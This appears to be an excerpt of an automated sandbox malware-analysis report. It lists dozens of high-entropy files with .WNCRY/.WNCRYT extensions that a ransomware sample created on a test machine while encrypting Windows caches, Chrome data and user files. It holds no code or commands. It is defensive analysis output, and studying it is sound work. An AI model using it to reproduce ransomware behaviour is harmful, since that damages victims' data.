Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT entropy: 7.99992072639	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_6[1].txt.WNCRYT entropy: 7.99548732171	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT entropy: 7.99995674397	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_7[1].txt.WNCRYT entropy: 7.99906675767	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT entropy: 7.99818421575	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt.WNCRYT entropy: 7.99608409501	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT entropy: 7.99979777665	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt.WNCRYT entropy: 7.99719160961	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT entropy: 7.99984014291	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRYT entropy: 7.99598914203	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT entropy: 7.99981626256	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT entropy: 7.99982486167	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT entropy: 7.99996674656	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT entropy: 7.99726727428	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT entropy: 7.9998177799	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\36378e77.png.WNCRYT entropy: 7.99198225197	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\1ae6599e75337c3a\ActivitiesCache.db.WNCRYT entropy: 7.99984154762	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\ActivitiesCache.db.WNCRYT entropy: 7.99983857822	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT entropy: 7.99432029064	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99989901386	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT entropy: 7.99992165999	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.99974866071	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT entropy: 7.99923198072	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Intel\CUIPromotions\Images\000000_INTEL.ODYSSEY_ADDITIONAL_GAMEPLAY_ASSET_CUI.2.3-600x300.png.WNCRYT entropy: 7.99918710646	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3075AAB0-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT entropy: 7.99955013857	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000037.db.WNCRYT entropy: 7.99799448198	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000002a.db.WNCRYT entropy: 7.99761986485	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000002b.db.WNCRYT entropy: 7.99708968772	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133663979588962890.txt.WNCRYT entropy: 7.99814598757	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRYT entropy: 7.99504337952	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133663980110963572.txt.WNCRYT entropy: 7.99826425195	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\eventpage_bin_prod.js.WNCRYT entropy: 7.9972649449	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRYT entropy: 7.99844493874	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT entropy: 7.99973530191	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664196401331849.txt.WNCRYT entropy: 7.99830565486	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT entropy: 7.9977256426	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\65\4bnLx4S3ZRMpYV30k3R5vRy8JVg[1].js.WNCRYT entropy: 7.9914225427	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ea91225a-124d-44ac-a71c-a1f2683bf2a0}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99634781809	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664196701332050.txt.WNCRYT entropy: 7.99844759878	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Desktop\s.wnry entropy: 7.998263053	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Desktop\t.wnry entropy: 7.99727613788	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT entropy: 7.99966068279	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appsglobals.txt.WNCRYT entropy: 7.99944724992	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appssynonyms.txt.WNCRYT entropy: 7.99956264676	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c1232008-cc52-49cc-b5f1-23c1b5d7d5ac}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.995946757	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c848d914-ba53-4c20-8f7c-784438ddc552}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99597013792	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRYT entropy: 7.99921528294	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRYT entropy: 7.99754997178	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy) entropy: 7.99966068279	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRY (copy) entropy: 7.99921528294	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRY (copy) entropy: 7.99754997178	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRY (copy) entropy: 7.9993901607	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRY (copy) entropy: 7.9936065146	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRY (copy) entropy: 7.99884679638	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRY (copy) entropy: 7.99272832834	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy) entropy: 7.99974866071	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133663979588962890.txt.WNCRY (copy) entropy: 7.99814598757	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133663980110963572.txt.WNCRY (copy) entropy: 7.99826425195	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664196401331849.txt.WNCRY (copy) entropy: 7.99830565486	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appsglobals.txt.WNCRY (copy) entropy: 7.99944724992	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appssynonyms.txt.WNCRY (copy) entropy: 7.99956264676	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c1232008-cc52-49cc-b5f1-23c1b5d7d5ac}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.995946757	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c848d914-ba53-4c20-8f7c-784438ddc552}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99597013792	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d17da1ee-054d-4d15-97a5-4869d17ec228}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99681653215	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appsconversions.txt.WNCRY (copy) entropy: 7.99989674461	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingsconversions.txt.WNCRY (copy) entropy: 7.99961308193	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingsglobals.txt.WNCRY (copy) entropy: 7.99686955785	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingssynonyms.txt.WNCRY (copy) entropy: 7.99840227336	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{b5f948f2-ed43-4efa-a5e8-c66e8e4b2569}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99904477518	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99918109236	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt.WNCRY (copy) entropy: 7.99900831863	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt.WNCRY (copy) entropy: 7.99514108186	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt.WNCRY (copy) entropy: 7.9992070169	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt.WNCRY (copy) entropy: 7.99691946201	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt.WNCRY (copy) entropy: 7.99864001722	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_16[1].txt.WNCRY (copy) entropy: 7.99784733723	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_18[1].txt.WNCRY (copy) entropy: 7.99850649486	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_19[1].txt.WNCRY (copy) entropy: 7.99832041058	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_20[1].txt.WNCRY (copy) entropy: 7.99730132449	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_21[1].txt.WNCRY (copy) entropy: 7.9952528617	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_22[1].txt.WNCRY (copy) entropy: 7.99910028877	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_24[1].txt.WNCRY (copy) entropy: 7.99621382114	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_25[1].txt.WNCRY (copy) entropy: 7.99516245725	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_26[1].txt.WNCRY (copy) entropy: 7.99975092602	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRY (copy) entropy: 7.99803440825	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_28[1].txt.WNCRY (copy) entropy: 7.9990024496	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_29[1].txt.WNCRY (copy) entropy: 7.99018623416	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_2[1].txt.WNCRY (copy) entropy: 7.997611921	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_3[1].txt.WNCRY (copy) entropy: 7.99129357087	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_4[1].txt.WNCRY (copy) entropy: 7.99184419324	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_6[1].txt.WNCRY (copy) entropy: 7.99548732171	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_7[1].txt.WNCRY (copy) entropy: 7.99906675767	Jump to dropped file
